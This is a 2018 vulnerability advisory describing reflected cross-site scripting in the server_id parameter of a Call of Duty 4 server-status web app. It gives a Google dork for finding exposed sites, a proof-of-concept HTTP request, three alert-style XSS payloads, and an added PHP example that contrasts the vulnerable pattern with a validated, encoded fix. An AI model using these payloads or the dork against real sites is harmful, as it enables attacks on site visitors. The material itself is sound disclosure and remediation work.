Cod4 status - Cross-site scripting (XSS)

2018.09.11
Author: kodak (IR)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Cod4 status - Cross-site scripting (XSS)
# Exploit Author: kodak
# Date: 2018-09-11
# Google Dork: inurl:"banned.php?server_id="
# Software Link: https://github.com/SirReaDy/cod4-status-server
# Category : webapps
# Tested on: Kali Linux / Windows 7
# CVE: N/A

1. Description:
--------------------
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.

What is "Cod4 status screenshot view web"? It gives you a list of the players currently on the server, the server administrator list, the banned player list and the screenshots taken with the $getss command.

2. Exploit/POC:
--------------------
# Request:
http://127.0.0.1/banned.php?server_id="><script>alert("K0DAK:]")</script>

GET /banned.php?server_id=%22%3E%3Cscript%3Ealert(%22K0DAK:]%22)%3C/script%3E HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=l89iuld37adri6s9krvum4n7q0
Connection: keep-alive
Upgrade-Insecure-Requests: 1

# Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 2554
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=5, max=100
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding: gzip

Parameter: server_id
Type: Reflected (GET)
Location: banned.php
Payloads:
  server_id="><script>alert("K0DAK:]")</script>
  Or
  server_id="><iframe/src=javascript:confirm(2)>X
  Or
  server_id="/><svg/onload=prompt(1)>

3. Screenshot
--------------------
https://imgur.com/a/g95fG0l
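The advisory shows the server_id parameter being reflected into banned.php unencoded. The following PHP is an added example written for this page, not code from the cod4-status-server project: the vulnerable function is a hypothetical reconstruction of the pattern the advisory implies (the parameter concatenated into an HTML attribute), and the function names (render_banned_link_vulnerable, render_banned_link_safe, validate_server_id, html_attr) are assumed. It shows the two fixes a maintainer would apply: validate server_id as an integer before use, and encode anything echoed into HTML with htmlspecialchars() and ENT_QUOTES.

```php
<?php
// Added example (not code from cod4-status-server). The vulnerable
// function is an assumed reconstruction of the reflected-XSS pattern
// the advisory describes; all function names here are hypothetical.

// --- Vulnerable pattern (assumed) ---------------------------------------
// The raw query parameter is concatenated straight into an HTML attribute.
// A value beginning with  ">  closes the attribute and the tag, so the
// browser parses the remainder of the value as markup and runs it.
function render_banned_link_vulnerable(array $get): string
{
    $server_id = $get['server_id'] ?? '';
    return '<a href="banned.php?server_id=' . $server_id . '">Banned players</a>';
}

// --- Hardened version ---------------------------------------------------
// 1. Validate: server_id is an identifier, so accept only a non-negative
//    integer and reject everything else before it reaches the template.
function validate_server_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $id === false ? null : $id;
}

// 2. Encode: every value echoed into HTML goes through htmlspecialchars()
//    with ENT_QUOTES, so ", ', <, > and & can never terminate an attribute
//    or open a tag. Applied even to the validated integer as defence in
//    depth, so a later change to accept string ids stays safe.
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_banned_link_safe(array $get): string
{
    $server_id = validate_server_id($get['server_id'] ?? '');
    if ($server_id === null) {
        // Malformed id: render a fixed message, never the attacker's input.
        return '<p>Invalid server id.</p>';
    }
    return '<a href="banned.php?server_id=' . html_attr((string) $server_id) . '">Banned players</a>';
}

// Demonstration with the advisory's first payload as constructed input.
$payload = ['server_id' => '"><script>alert("K0DAK:]")</script>'];
echo render_banned_link_vulnerable($payload), "\n"; // attribute broken, <script> emitted
echo render_banned_link_safe($payload), "\n";       // <p>Invalid server id.</p>
echo render_banned_link_safe(['server_id' => '7']), "\n"; // <a href="banned.php?server_id=7">...
```

Validation alone would already stop the three payloads listed above, but the output encoding is what makes the page safe regardless of what future parameters are reflected; a request-side filter on sequences such as %22%3E%3C only hides the symptom.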


Copyright 2018, cxsecurity.com